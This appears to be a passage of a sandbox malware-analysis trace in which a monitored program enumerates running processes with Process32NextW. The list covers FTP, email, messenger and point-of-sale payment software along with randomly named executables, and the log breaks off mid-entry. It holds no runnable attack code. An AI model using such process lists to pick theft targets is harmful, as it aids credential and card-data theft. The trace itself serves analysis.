1 [0100.333] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.333] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.334] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.334] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.335] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.335] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.336] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.336] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.337] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.337] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.338] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.338] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0100.339] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.339] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.340] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="chelsea.exe")) returned 1 [0100.340] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="temperature_lowest.exe")) returned 1 [0100.341] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="holmes rejected dividend.exe")) returned 1 [0100.341] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="enters.exe")) returned 1 [0100.342] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="championshipsmpegs.exe")) returned 1 [0100.342] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alfred_both.exe")) returned 1 [0100.343] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="facilitatebranchesanymore.exe")) returned 1 [0100.343] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="releases.exe")) returned 1 [0100.344] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediterranean.exe")) returned 1 [0100.344] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="junk_ti.exe")) returned 1 [0100.344] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gps_conduct_strips.exe")) returned 1 [0100.345] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="appealfaqcove.exe")) returned 1 [0100.345] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="generated.exe")) returned 1 [0100.346] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbaemotions.exe")) returned 1 [0100.346] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="cowdirector.exe")) returned 1 [0100.347] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pill sri.exe")) returned 1 [0100.347] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightweight-yr.exe")) returned 1 [0100.348] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="somerset_concluded_twice.exe")) returned 1 [0100.348] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.349] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.350] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.351] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.351] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.352] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.352] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.352] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.353] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.353] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.354] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.354] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.355] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.355] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.356] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.357] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.357] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.358] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0100.360] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.363] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.364] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.364] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.412] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0100.413] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.414] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.415] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.415] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.416] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.417] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.417] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.418] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.419] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.420] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.420] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.421] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.422] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.422] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.423] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.424] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.424] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.425] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.425] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.426] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.427] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.427] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="numerous-worm-coding.exe")) returned 1 [0100.428] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0100.429] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="anadecadessrc.exe")) returned 1 [0100.429] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.430] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.431] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.431] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0100.432] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.432] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, 